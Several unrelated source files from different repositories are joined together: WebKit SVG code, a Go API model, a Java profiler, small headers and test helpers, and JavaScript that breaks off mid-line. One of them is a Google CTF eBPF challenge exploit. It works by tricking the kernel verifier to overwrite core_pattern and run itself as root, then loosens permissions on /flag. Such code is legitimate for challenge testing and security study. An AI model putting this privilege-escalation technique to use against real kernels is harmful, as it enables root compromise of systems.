/* * Copyright (C) 2004, 2005, 2006, 2008 <NAME> <<EMAIL>> * Copyright (C) 2004, 2005, 2006, 2007 <NAME> <<EMAIL>> * Copyright (C) 2008 <NAME> <<EMAIL>> * Copyright (C) 2008 <NAME> <<EMAIL>> * Copyright (C) Research In Motion Limited 2010. All rights reserved. * Copyright (C) 2018-2019 Apple Inc. All rights reserved. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Library General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Library General Public License for more details. * * You should have received a copy of the GNU Library General Public License * along with this library; see the file COPYING.LIB. If not, write to * the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, * Boston, MA 02110-1301, USA. */ #include "config.h" #include "SVGRadialGradientElement.h" #include "FloatConversion.h" #include "FloatPoint.h" #include "RadialGradientAttributes.h" #include "RenderSVGResourceRadialGradient.h" #include "SVGNames.h" #include "SVGStopElement.h" #include "SVGUnitTypes.h" #include <wtf/IsoMallocInlines.h> #include <wtf/NeverDestroyed.h> namespace WebCore { WTF_MAKE_ISO_ALLOCATED_IMPL(SVGRadialGradientElement); inline SVGRadialGradientElement::SVGRadialGradientElement(const QualifiedName& tagName, Document& document) : SVGGradientElement(tagName, document) { // Spec: If the cx/cy/r/fr attribute is not specified, the effect is as if a value of "50%" were specified. ASSERT(hasTagName(SVGNames::radialGradientTag)); static std::once_flag onceFlag; std::call_once(onceFlag, [] { PropertyRegistry::registerProperty<SVGNames::cxAttr, &SVGRadialGradientElement::m_cx>(); PropertyRegistry::registerProperty<SVGNames::cyAttr, &SVGRadialGradientElement::m_cy>(); PropertyRegistry::registerProperty<SVGNames::rAttr, &SVGRadialGradientElement::m_r>(); PropertyRegistry::registerProperty<SVGNames::fxAttr, &SVGRadialGradientElement::m_fx>(); PropertyRegistry::registerProperty<SVGNames::fyAttr, &SVGRadialGradientElement::m_fy>(); PropertyRegistry::registerProperty<SVGNames::frAttr, &SVGRadialGradientElement::m_fr>(); }); } Ref<SVGRadialGradientElement> SVGRadialGradientElement::create(const QualifiedName& tagName, Document& document) { return adoptRef(*new SVGRadialGradientElement(tagName, document)); } void SVGRadialGradientElement::parseAttribute(const QualifiedName& name, const AtomString& value) { SVGParsingError parseError = NoError; if (name == SVGNames::cxAttr) m_cx->setBaseValInternal(SVGLengthValue::construct(SVGLengthMode::Width, value, parseError)); else if (name == SVGNames::cyAttr) m_cy->setBaseValInternal(SVGLengthValue::construct(SVGLengthMode::Height, value, parseError)); else if (name == SVGNames::rAttr) m_r->setBaseValInternal(SVGLengthValue::construct(SVGLengthMode::Other, value, parseError, SVGLengthNegativeValuesMode::Forbid)); else if (name == SVGNames::fxAttr) m_fx->setBaseValInternal(SVGLengthValue::construct(SVGLengthMode::Width, value, parseError)); else if (name == SVGNames::fyAttr) m_fy->setBaseValInternal(SVGLengthValue::construct(SVGLengthMode::Height, value, parseError)); else if (name == SVGNames::frAttr) m_fr->setBaseValInternal(SVGLengthValue::construct(SVGLengthMode::Other, value, parseError, SVGLengthNegativeValuesMode::Forbid)); reportAttributeParsingError(parseError, name, value); SVGGradientElement::parseAttribute(name, value); } void SVGRadialGradientElement::svgAttributeChanged(const QualifiedName& attrName) { if (PropertyRegistry::isKnownAttribute(attrName)) { InstanceInvalidationGuard guard(*this); updateRelativeLengthsInformation(); if (RenderObject* object = renderer()) object->setNeedsLayout(); return; } SVGGradientElement::svgAttributeChanged(attrName); } RenderPtr<RenderElement> SVGRadialGradientElement::createElementRenderer(RenderStyle&& style, const RenderTreePosition&) { return createRenderer<RenderSVGResourceRadialGradient>(*this, WTFMove(style)); } static void setGradientAttributes(SVGGradientElement& element, RadialGradientAttributes& attributes, bool isRadial = true) { if (!attributes.hasSpreadMethod() && element.hasAttribute(SVGNames::spreadMethodAttr)) attributes.setSpreadMethod(element.spreadMethod()); if (!attributes.hasGradientUnits() && element.hasAttribute(SVGNames::gradientUnitsAttr)) attributes.setGradientUnits(element.gradientUnits()); if (!attributes.hasGradientTransform() && element.hasAttribute(SVGNames::gradientTransformAttr)) attributes.setGradientTransform(element.gradientTransform().concatenate()); if (!attributes.hasStops()) attributes.setStops(element.buildStops()); if (isRadial) { SVGRadialGradientElement& radial = downcast<SVGRadialGradientElement>(element); if (!attributes.hasCx() && element.hasAttribute(SVGNames::cxAttr)) attributes.setCx(radial.cx()); if (!attributes.hasCy() && element.hasAttribute(SVGNames::cyAttr)) attributes.setCy(radial.cy()); if (!attributes.hasR() && element.hasAttribute(SVGNames::rAttr)) attributes.setR(radial.r()); if (!attributes.hasFx() && element.hasAttribute(SVGNames::fxAttr)) attributes.setFx(radial.fx()); if (!attributes.hasFy() && element.hasAttribute(SVGNames::fyAttr)) attributes.setFy(radial.fy()); if (!attributes.hasFr() && element.hasAttribute(SVGNames::frAttr)) attributes.setFr(radial.fr()); } } bool SVGRadialGradientElement::collectGradientAttributes(RadialGradientAttributes& attributes) { if (!renderer()) return false; HashSet<SVGGradientElement*> processedGradients; SVGGradientElement* current = this; setGradientAttributes(*current, attributes); processedGradients.add(current); while (true) { // Respect xlink:href, take attributes from referenced element auto target = SVGURIReference::targetElementFromIRIString(current->href(), treeScope()); if (is<SVGGradientElement>(target.element)) { current = downcast<SVGGradientElement>(target.element.get()); // Cycle detection if (processedGradients.contains(current)) break; if (!current->renderer()) return false; setGradientAttributes(*current, attributes, current->hasTagName(SVGNames::radialGradientTag)); processedGradients.add(current); } else break; } // Handle default values for fx/fy if (!attributes.hasFx()) attributes.setFx(attributes.cx()); if (!attributes.hasFy()) attributes.setFy(attributes.cy()); return true; } bool SVGRadialGradientElement::selfHasRelativeLengths() const { return cx().isRelative() || cy().isRelative() || r().isRelative() || fx().isRelative() || fy().isRelative() || fr().isRelative(); } }
BearerPipelineTest/google-ctf
2021/quals/pwn-ebpf/healthcheck/exploit.c
<reponame>BearerPipelineTest/google-ctf /* Copyright 2021 Google LLC Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at https://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ #define _GNU_SOURCE #include <assert.h> #include <errno.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> #include <stddef.h> #include <unistd.h> #include <fcntl.h> #include <linux/bpf.h> #include <sys/mman.h> #include <sys/ioctl.h> #include <sys/socket.h> #include <sys/syscall.h> #define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0])) #undef NDEBUG // https://www.kernel.org/doc/Documentation/networking/filter.txt // eBPF has one 16-byte instruction: BPF_LD | BPF_DW | BPF_IMM which consists // of two consecutive 'struct bpf_insn' 8-byte blocks and interpreted as single // instruction that loads 64-bit immediate value into a dst_reg. // When src_reg != 0 then it's used to represent operations that load maps or // other special values. // https://elixir.bootlin.com/linux/v5.12.9/source/include/uapi/linux/bpf.h#L365 #define bpf_ldimm64_or_special(dst_reg, src_reg, imm) \ bpf_insn(BPF_LD | BPF_DW | BPF_IMM, (dst_reg), (src_reg), 0, (imm) & 0xffffffff), \ bpf_insn(0, 0, 0, 0, (uint64_t)(imm) >> 32) #define bpf_load_imm64(dst_reg, imm) bpf_ldimm64_or_special(dst_reg, 0, imm) // When src_reg == BPF_PSEUDO_MAP_FD, this loads the address of a map into a register #define bpf_load_map(dst_reg, mapfd) bpf_ldimm64_or_special(dst_reg, BPF_PSEUDO_MAP_FD, mapfd) // Adjust these if you recompile the kernel // The build script exports symbols.txt into the challenge folder, grep for // core_pattern and array_map_ops to get the addresses. const uint64_t core_pattern_base = 0xffffffff8295fee0; // 0xffffffff8295fee0; const uint64_t array_map_ops_base = 0xffffffff8239d4c0; // 0xffffffff8239cb00; // Adjust this with the actual path to our exploit. const char path_to_exploit[] = "|/tmp/p\x00"; static char verifier_log[8192]; static struct bpf_insn bpf_insn(uint8_t opcode, uint8_t dst_reg, uint8_t src_reg, int16_t off, int32_t imm) { struct bpf_insn ret = { .code = opcode, .dst_reg = dst_reg, .src_reg = src_reg, .off = off, .imm = imm, }; return ret; } static struct bpf_insn bpf_load_imm32(uint8_t dst_reg, int32_t imm) { return bpf_insn(BPF_ALU64 | BPF_MOV | BPF_K, dst_reg, 0, 0, imm); } static struct bpf_insn bpf_exit(void) { return bpf_insn(BPF_JMP | BPF_EXIT, 0, 0, 0, 0); } static struct bpf_insn bpf_xor_imm32(uint8_t dst_reg, int32_t imm) { return bpf_insn(BPF_ALU64 | BPF_XOR | BPF_K, dst_reg, 0, 0, imm); } static struct bpf_insn bpf_xor_reg(uint8_t dst_reg, uint8_t src_reg) { return bpf_insn(BPF_ALU64 | BPF_XOR | BPF_X, dst_reg, src_reg, 0, 0); } static struct bpf_insn bpf_add_imm32(uint8_t dst_reg, int32_t imm) { return bpf_insn(BPF_ALU64 | BPF_ADD | BPF_K, dst_reg, 0, 0, imm); } static struct bpf_insn bpf_sub_reg64(uint8_t dst_reg, uint8_t src_reg) { return bpf_insn(BPF_ALU64 | BPF_SUB | BPF_X, dst_reg, src_reg, 0, 0); } static struct bpf_insn bpf_mov_reg_reg(uint8_t dst_reg, uint8_t src_reg) { return bpf_insn(BPF_ALU64 | BPF_MOV | BPF_X, dst_reg, src_reg, 0, 0); } static struct bpf_insn bpf_call(int32_t function) { return bpf_insn(BPF_JMP | BPF_CALL, 0, 0, 0, function); } static struct bpf_insn bpf_jne_imm(uint8_t reg, int16_t dest, int32_t imm) { return bpf_insn(BPF_JMP | BPF_JNE | BPF_K, reg, 0, dest, imm); } // *(int32_t *)(base + offset) = imm static struct bpf_insn bpf_store_imm32(uint8_t base, int16_t offset, int32_t imm) { return bpf_insn(BPF_MEM | BPF_ST | BPF_W, base, 0, offset, imm); } // dst = *(uint64_t *)(base + offset) static struct bpf_insn bpf_load_reg64(uint8_t dst, uint8_t base, int16_t offset) { return bpf_insn(BPF_MEM | BPF_LDX | BPF_DW, dst, base, offset, 0); } // *(uint64_t *)(base + offset) = src static struct bpf_insn bpf_store_reg64(uint8_t base, int16_t offset, uint8_t src) { return bpf_insn(BPF_MEM | BPF_STX | BPF_DW, base, src, offset, 0); } static int load_prog(const struct bpf_insn *instructions, size_t size) { union bpf_attr attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insns = (uint64_t)instructions, .insn_cnt = size, .license = (uint64_t)"GPL", .log_level = 2, .log_buf = (uint64_t)verifier_log, .log_size = sizeof(verifier_log), }; int ret = syscall(SYS_bpf, BPF_PROG_LOAD, &attr, sizeof(attr)); if (ret < 0) { printf("Verifier returned %d, log: %s\n", ret, verifier_log); } return ret; } static int create_map(void) { union bpf_attr attr = { .map_type = BPF_MAP_TYPE_ARRAY, .key_size = 4, .value_size = 8, .max_entries = 0x100, }; return syscall(SYS_bpf, BPF_MAP_CREATE, &attr, sizeof(attr)); } static uint64_t read_map(int mapfd) { uint64_t out = 0; uint64_t key = 0; union bpf_attr attr = { .map_fd = mapfd, .key = (uint64_t)&key, .value = (uint64_t)&out, }; assert(syscall(SYS_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr)) >= 0); return out; } int main(void) { if (getuid() == 0) { // The kernel ran us as the core handler (as root), // change the permissions of the flag or something system("chmod 777 /flag"); return 0; } int mapfd = create_map(); assert(mapfd >= 0); const struct bpf_insn instructions[] = { // Store the map in r1 bpf_load_map(BPF_REG_1, mapfd), // Store the index (0) on the stack and a pointer to it in r2 bpf_store_imm32(BPF_REG_10, -4, 0), bpf_mov_reg_reg(BPF_REG_2, BPF_REG_10), bpf_add_imm32(BPF_REG_2, -4), // Get a pointer to the value in r0 bpf_call(BPF_FUNC_map_lookup_elem), // Exit if it's NULL to make the verifier happy bpf_jne_imm(BPF_REG_0, 1, 0), bpf_exit(), // to scalar bpf_xor_imm32(BPF_REG_0, 0), bpf_mov_reg_reg(BPF_REG_4, BPF_REG_0), bpf_mov_reg_reg(BPF_REG_5, BPF_REG_0), // to pointer and zero r4 bpf_xor_reg(BPF_REG_4, BPF_REG_4), // to scalar bpf_xor_imm32(BPF_REG_4, 0), // Move to the beginning of the struct where the ops pointer is stored bpf_add_imm32(BPF_REG_5, -0x110), bpf_xor_reg(BPF_REG_4, BPF_REG_5), // Read it out bpf_load_reg64(BPF_REG_5, BPF_REG_4, 0), // Compute the address of core_pattern bpf_load_imm32(BPF_REG_4, (int64_t)(array_map_ops_base - core_pattern_base)), bpf_sub_reg64(BPF_REG_5, BPF_REG_4), bpf_xor_imm32(BPF_REG_0, 0), bpf_store_reg64(BPF_REG_0, 0, BPF_REG_5), // Exit bpf_load_imm32(BPF_REG_0, 0), bpf_exit(), }; // Create and attach the filter int sockets[2]; int progfd = load_prog(instructions, ARRAY_SIZE(instructions)); assert(progfd >= 0); assert(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) >= 0); assert(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) >= 0); // Run the filter write(sockets[0], "AAAA", 4); uint64_t core_pattern = read_map(mapfd); printf("core_pattern: %#lx\n", core_pattern); const struct bpf_insn instructions2[] = { // Store the map in r1 bpf_load_map(BPF_REG_1, mapfd), // Store the index (0) on the stack and a pointer to it in r2 bpf_store_imm32(BPF_REG_10, -4, 0), bpf_mov_reg_reg(BPF_REG_2, BPF_REG_10), bpf_add_imm32(BPF_REG_2, -4), // Get a pointer to the value in r0 bpf_call(BPF_FUNC_map_lookup_elem), // Exit if it's NULL to make the verifier happy bpf_jne_imm(BPF_REG_0, 1, 0), bpf_exit(), // Turn it into a scalar bpf_xor_imm32(BPF_REG_0, 0), // Zero it (back to pointer) bpf_xor_reg(BPF_REG_0, BPF_REG_0), // Back to scalar bpf_xor_imm32(BPF_REG_0, 0), // Xor it with the address of core_pattern (back to pointer) bpf_load_imm64(BPF_REG_3, core_pattern), bpf_xor_reg(BPF_REG_0, BPF_REG_3), // Overwrite core_pattern with the path to our exploit bpf_load_imm64(BPF_REG_3, *(uint64_t *)path_to_exploit), bpf_store_reg64(BPF_REG_0, 0, BPF_REG_3), // Exit bpf_load_imm32(BPF_REG_0, 0), bpf_exit(), }; int progfd2 = load_prog(instructions2, ARRAY_SIZE(instructions2)); assert(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd2, sizeof(progfd2)) >= 0); write(sockets[0], "AAAA", 4); // Crash and run ourselves as the core handler asm volatile("ud2"); return 0; }
microsoftgraph/msgraph-beta-sdk-go
models/privileged_role_summary.go
<filename>models/privileged_role_summary.go package models import ( i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91 "github.com/microsoft/kiota-abstractions-go/serialization" ) // PrivilegedRoleSummary type PrivilegedRoleSummary struct { Entity // The number of users that have the role assigned and the role is activated. elevatedCount *int32 // The number of users that have the role assigned but the role is deactivated. managedCount *int32 // true if the role activation requires MFA. false if the role activation doesn't require MFA. mfaEnabled *bool // Possible values are: ok, bad. The value depends on the ratio of (managedCount / usersCount). If the ratio is less than a predefined threshold, ok is returned. Otherwise, bad is returned. status *RoleSummaryStatus // The number of users that are assigned with the role. usersCount *int32 } // NewPrivilegedRoleSummary instantiates a new privilegedRoleSummary and sets the default values. func NewPrivilegedRoleSummary()(*PrivilegedRoleSummary) { m := &PrivilegedRoleSummary{ Entity: *NewEntity(), } return m } // CreatePrivilegedRoleSummaryFromDiscriminatorValue creates a new instance of the appropriate class based on discriminator value func CreatePrivilegedRoleSummaryFromDiscriminatorValue(parseNode i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode)(i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.Parsable, error) { return NewPrivilegedRoleSummary(), nil } // GetElevatedCount gets the elevatedCount property value. The number of users that have the role assigned and the role is activated. func (m *PrivilegedRoleSummary) GetElevatedCount()(*int32) { if m == nil { return nil } else { return m.elevatedCount } } // GetFieldDeserializers the deserialization information for the current model func (m *PrivilegedRoleSummary) GetFieldDeserializers()(map[string]func(i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode)(error)) { res := m.Entity.GetFieldDeserializers() res["elevatedCount"] = func (n i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode) error { val, err := n.GetInt32Value() if err != nil { return err } if val != nil { m.SetElevatedCount(val) } return nil } res["managedCount"] = func (n i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode) error { val, err := n.GetInt32Value() if err != nil { return err } if val != nil { m.SetManagedCount(val) } return nil } res["mfaEnabled"] = func (n i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode) error { val, err := n.GetBoolValue() if err != nil { return err } if val != nil { m.SetMfaEnabled(val) } return nil } res["status"] = func (n i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode) error { val, err := n.GetEnumValue(ParseRoleSummaryStatus) if err != nil { return err } if val != nil { m.SetStatus(val.(*RoleSummaryStatus)) } return nil } res["usersCount"] = func (n i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode) error { val, err := n.GetInt32Value() if err != nil { return err } if val != nil { m.SetUsersCount(val) } return nil } return res } // GetManagedCount gets the managedCount property value. The number of users that have the role assigned but the role is deactivated. func (m *PrivilegedRoleSummary) GetManagedCount()(*int32) { if m == nil { return nil } else { return m.managedCount } } // GetMfaEnabled gets the mfaEnabled property value. true if the role activation requires MFA. false if the role activation doesn't require MFA. func (m *PrivilegedRoleSummary) GetMfaEnabled()(*bool) { if m == nil { return nil } else { return m.mfaEnabled } } // GetStatus gets the status property value. Possible values are: ok, bad. The value depends on the ratio of (managedCount / usersCount). If the ratio is less than a predefined threshold, ok is returned. Otherwise, bad is returned. func (m *PrivilegedRoleSummary) GetStatus()(*RoleSummaryStatus) { if m == nil { return nil } else { return m.status } } // GetUsersCount gets the usersCount property value. The number of users that are assigned with the role. func (m *PrivilegedRoleSummary) GetUsersCount()(*int32) { if m == nil { return nil } else { return m.usersCount } } // Serialize serializes information the current object func (m *PrivilegedRoleSummary) Serialize(writer i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.SerializationWriter)(error) { err := m.Entity.Serialize(writer) if err != nil { return err } { err = writer.WriteInt32Value("elevatedCount", m.GetElevatedCount()) if err != nil { return err } } { err = writer.WriteInt32Value("managedCount", m.GetManagedCount()) if err != nil { return err } } { err = writer.WriteBoolValue("mfaEnabled", m.GetMfaEnabled()) if err != nil { return err } } if m.GetStatus() != nil { cast := (*m.GetStatus()).String() err = writer.WriteStringValue("status", &cast) if err != nil { return err } } { err = writer.WriteInt32Value("usersCount", m.GetUsersCount()) if err != nil { return err } } return nil } // SetElevatedCount sets the elevatedCount property value. The number of users that have the role assigned and the role is activated. func (m *PrivilegedRoleSummary) SetElevatedCount(value *int32)() { if m != nil { m.elevatedCount = value } } // SetManagedCount sets the managedCount property value. The number of users that have the role assigned but the role is deactivated. func (m *PrivilegedRoleSummary) SetManagedCount(value *int32)() { if m != nil { m.managedCount = value } } // SetMfaEnabled sets the mfaEnabled property value. true if the role activation requires MFA. false if the role activation doesn't require MFA. func (m *PrivilegedRoleSummary) SetMfaEnabled(value *bool)() { if m != nil { m.mfaEnabled = value } } // SetStatus sets the status property value. Possible values are: ok, bad. The value depends on the ratio of (managedCount / usersCount). If the ratio is less than a predefined threshold, ok is returned. Otherwise, bad is returned. func (m *PrivilegedRoleSummary) SetStatus(value *RoleSummaryStatus)() { if m != nil { m.status = value } } // SetUsersCount sets the usersCount property value. The number of users that are assigned with the role. func (m *PrivilegedRoleSummary) SetUsersCount(value *int32)() { if m != nil { m.usersCount = value } }
AllaMaevskaya/AliRoot
STEER/STEER/AliCorrQAChecker.h
#ifndef ALICORRQACHECKER_H #define ALICORRQACHECKER_H /* Copyright(c) 1998-1999, ALICE Experiment at CERN, All rights reserved. * * See cxx source for full Copyright notice */ /* $Id: AliCorrQAChecker.h 27115 2008-07-04 15:12:14Z hristov $ */ /* Checks the quality assurance. By comparing with reference data <NAME> CERN July 2007 */ // --- ROOT system --- class TFile ; class TH1F ; class TH1I ; // --- Standard library --- // --- AliRoot header files --- #include "AliQACheckerBase.h" class AliCorrLoader ; class AliCorrQAChecker: public AliQACheckerBase { public: AliCorrQAChecker() : AliQACheckerBase("Corr","Corr Quality Assurance Data Maker") {;} // ctor virtual ~AliCorrQAChecker() {;} // dtor virtual void Run(AliQAv1::ALITASK_t /*tsk*/, TNtupleD ** /*nt*/, AliDetectorRecoParam * /*recoParam*/) ; private: AliCorrQAChecker(const AliCorrQAChecker& qac); // Not implemented AliCorrQAChecker& operator=(const AliCorrQAChecker& qac); // Not implemented Double_t * CheckN(AliQAv1::ALITASK_t index, TNtupleD ** nData, AliDetectorRecoParam * recoParam) ; ClassDef(AliCorrQAChecker,1) // description }; #endif // AliCORRQAChecker_H
phil-davis/robotframework
atest/testdata/keywords/library_with_keywords_with_dots_in_name.py
<reponame>phil-davis/robotframework class library_with_keywords_with_dots_in_name(object): def get_keyword_names(self): return ['Dots.in.name.in.a.library', 'Multiple...dots . . in . a............row.in.a.library', 'Ending with a dot. In a library.'] def run_keyword(self, name, args): return '-'.join(args)
miladajilian/MimMessenger
submodules/LegacyComponents/LegacyComponents/TGBackdropView.h
<filename>submodules/LegacyComponents/LegacyComponents/TGBackdropView.h<gh_stars>1-10 #import <UIKit/UIKit.h> @interface TGBackdropView : UIView + (TGBackdropView *)viewWithLightNavigationBarStyle; @end
jsmeow/nebluax
src/main/controller/entities/entity/game/combat/shield/shield.js
const { window } = require('../../../../../../options'); const CombatEntity = require('../combat-entity'); const timers = require('../../../../timers/entity-timers'); const update = require('../../../../update/update-entity'); const exception = require('../../../../../../exception/exception'); const emojis = require('emoji.json/emoji-compact.json'); function Shield(args) { CombatEntity.call( this, Object.assign(args, { x: (args.parent.x + args.parent.width * 0.5) / window.scale, y: (args.parent.y + args.parent.height * 0.5) / window.scale, parent: args.parent || exception.entity.args.parent(), faction: args.parent.faction || exception.entity.args.faction(), health: args.health || Shield.HEALTH }) ); // Add the shield timer to the timer list this.timers.shield = timers.game.shield(); // Add the entity shield position action to the entity update actions list this.actions.push(update.game.position.shield); } Shield.prototype = Object.create(CombatEntity.prototype); Shield.PATH = `${CombatEntity.PATH}/shield`; Shield.EMOJI = emojis[3215]; Shield.HEALTH = 1; module.exports = Shield;
mshrutm/javamelody
javamelody-core/src/main/java/net/bull/javamelody/internal/model/SamplingProfiler.java
/* * Copyright 2008-2019 by <NAME> * * This file is part of Java Melody. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package net.bull.javamelody.internal.model; import java.io.Serializable; import java.util.ArrayList; import java.util.Arrays; import java.util.Collections; import java.util.HashMap; import java.util.Iterator; import java.util.List; import java.util.Map; /** * Detect CPU hotspots CPU by periodic sampling of the stack-traces of the threads. * @author <NAME> with some ideas from C&<NAME> */ public class SamplingProfiler { /** * Excluded packages by default : those of the jvm, of tomcat... */ private static final String[] DEFAULT_EXCLUDED_PACKAGES = { "java.", "sun.", "com.sun.", "javax.", "org.apache.", "org.hibernate.", "oracle.", "org.postgresql.", "org.eclipse.", }; /** * Maximum number of methods to hold into memory */ private static final int MAX_DATA_SIZE = 10000; private final String[] excludedPackages; private final String[] includedPackages; private final Map<SampledMethod, SampledMethod> data = new HashMap<>(); /** * Sampled method. * @author <NAME> */ public static class SampledMethod implements Comparable<SampledMethod>, Serializable { private static final long serialVersionUID = 1L; private long count; private final String className; private final String methodName; private transient int hash; SampledMethod(String className, String methodName) { super(); assert className != null; assert methodName != null; this.className = className; this.methodName = methodName; this.hash = className.hashCode() * 31 + methodName.hashCode(); } // hash is transient private Object readResolve() { this.hash = className.hashCode() * 31 + methodName.hashCode(); return this; } void incrementCount() { count++; } public long getCount() { return count; } void setCount(long count) { this.count = count; } public String getClassName() { return this.className; } public String getMethodName() { return this.methodName; } @Override public int compareTo(SampledMethod method) { return Long.compare(method.count, count); } @Override public int hashCode() { return hash; } @Override public boolean equals(Object obj) { if (this == obj) { return true; } if (obj == null) { return false; } if (getClass() != obj.getClass()) { return false; } final SampledMethod other = (SampledMethod) obj; return methodName.equals(other.methodName) && className.equals(other.className); } @Override public String toString() { return className + '.' + methodName; } } /** * Constructor. * Excluded packages by default "java,sun,com.sun,javax,org.apache,org.hibernate,oracle,org.postgresql,org.eclipse" */ public SamplingProfiler() { super(); this.excludedPackages = DEFAULT_EXCLUDED_PACKAGES; this.includedPackages = null; } /** * Constructor. * @param excludedPackages List of excluded packages (can be null) * @param includedPackages List of included packages (can be null) */ public SamplingProfiler(List<String> excludedPackages, List<String> includedPackages) { super(); assert excludedPackages != null || includedPackages != null; // In general, there are either excluded packages or included packages. // (If both, excluded result has priority over included result: it excludes some included.) this.excludedPackages = verifyPackageNames(excludedPackages); this.includedPackages = verifyPackageNames(includedPackages); } /** * Constructor. * @param excludedPackages List of excluded packages separated by comma (can be null) * @param includedPackages List of included packages separated by comma (can be null) */ public SamplingProfiler(String excludedPackages, String includedPackages) { this(splitPackageNames(excludedPackages), splitPackageNames(includedPackages)); // In general, there are either excluded packages or included packages. // (If both, excluded result has priority over included result: it excludes some included.) } private static List<String> splitPackageNames(String packageNames) { if (packageNames == null) { return null; } return Arrays.asList(packageNames.split(",")); } private String[] verifyPackageNames(List<String> packageNames) { if (packageNames == null) { return null; } final String[] packages = packageNames.toArray(new String[0]); for (int i = 0; i < packages.length; i++) { packages[i] = packages[i].trim(); // NOPMD if (packages[i].isEmpty()) { throw new IllegalArgumentException( "A package can not be empty, item " + i + " in " + packageNames); } if (!packages[i].endsWith(".")) { packages[i] = packages[i] + '.'; // NOPMD } } return packages; } public synchronized void update() { final Map<Thread, StackTraceElement[]> stackTraces = Thread.getAllStackTraces(); try { final Thread currentThread = Thread.currentThread(); for (final Map.Entry<Thread, StackTraceElement[]> entry : stackTraces.entrySet()) { final Thread thread = entry.getKey(); final StackTraceElement[] stackTrace = entry.getValue(); if (stackTrace.length > 0 && thread.getState() == Thread.State.RUNNABLE && thread != currentThread) { for (final StackTraceElement element : stackTrace) { if (!isPackageExcluded(element)) { addSample(element); break; } } } } } finally { limitDataSize(); } } private void addSample(StackTraceElement element) { final SampledMethod key = new SampledMethod(element.getClassName(), element.getMethodName()); // or final String key = element.getClassName() + '.' + element.getMethodName(); SampledMethod method = this.data.get(key); if (method == null) { method = key; // or method = new SampledMethod(element.getClassName(), element.getMethodName()); this.data.put(key, method); } // on pourrait incrémenter la valeur selon l'augmentation de cpuTime pour ce thread, // mais l'intervalle entre deux samples est probablement trop grand // pour que le cpu du thread entre les deux intervalles ait un rapport avec cette méthode method.incrementCount(); } private void limitDataSize() { long minCount = 1; int size = data.size(); while (size > MAX_DATA_SIZE) { final Iterator<SampledMethod> iterator = data.keySet().iterator(); while (iterator.hasNext() && size > MAX_DATA_SIZE) { final SampledMethod method = iterator.next(); if (method.getCount() <= minCount) { iterator.remove(); size--; } } minCount++; } } private boolean isPackageExcluded(StackTraceElement element) { return excludedPackages != null && isPackageMatching(element, excludedPackages) || includedPackages != null && !isPackageMatching(element, includedPackages); } private boolean isPackageMatching(StackTraceElement element, String[] packageNames) { final String className = element.getClassName(); for (final String packageName : packageNames) { if (className.startsWith(packageName)) { return true; } } return false; } public synchronized List<SampledMethod> getHotspots(int rows) { final List<SampledMethod> methods = new ArrayList<>(data.values()); Collections.sort(methods); return methods.subList(0, Math.min(rows, methods.size())); } public synchronized void clear() { data.clear(); } }
damedia/culture.ru
web/static/mk_exponats/js/exponats.js
$(function(){ $('.el-one').hover(function(){ $(this).addClass('el-one-hovered'); }, function(){ $(this).removeClass('el-one-hovered'); }); var scrollPane, api; $(window).load(function(){ /*var recalcScrollPane = function() { var expMaxNum = 0, expThisNum = 0, expMaxLine; $('.line').each(function(){ expThisNum = $(this).find('.el-one').length; if (expThisNum > expMaxNum) { expMaxNum = expThisNum; expMaxLine = $(this); } }) var expLineLast = expMaxNum - 1; var expLineLastLeft = $('.el-one:eq('+expLineLast+')', expMaxLine).position().left; var expLineLastWidth = $('.el-one:eq('+expLineLast+')', expMaxLine).width(); $('.exponats-scroll').width(expLineLastLeft + expLineLastWidth + 250); /*if (scrollPane) { api.reinitialise(); } };*/ $('.exponats-scroll-pane').each(function(){ scrollPane = $(this).jScrollPane({animateScroll:true}); api = scrollPane.data('jsp'); var throttleTimeout; $(window).bind( 'resize', function() { if ($.browser.msie) { if (!throttleTimeout) { throttleTimeout = setTimeout( function() { api.reinitialise(); throttleTimeout = null; }, 50 ); } } else { api.reinitialise(); } } ); $('#scroll-right').bind( 'click', function() { api.scrollByX(200); } ); $('#scroll-left').bind( 'click', function() { api.scrollByX(-200); } ); scrollPane .bind( 'mousewheel', function (event, delta, deltaX, deltaY) { api.scrollByX(delta*-100); return false; } ) .bind( 'jsp-scroll-x', function(event, scrollPositionX, isAtLeft, isAtRight) { console.log('Handle jsp-scroll-x', this, 'scrollPositionX=', scrollPositionX, 'isAtLeft=', isAtLeft, 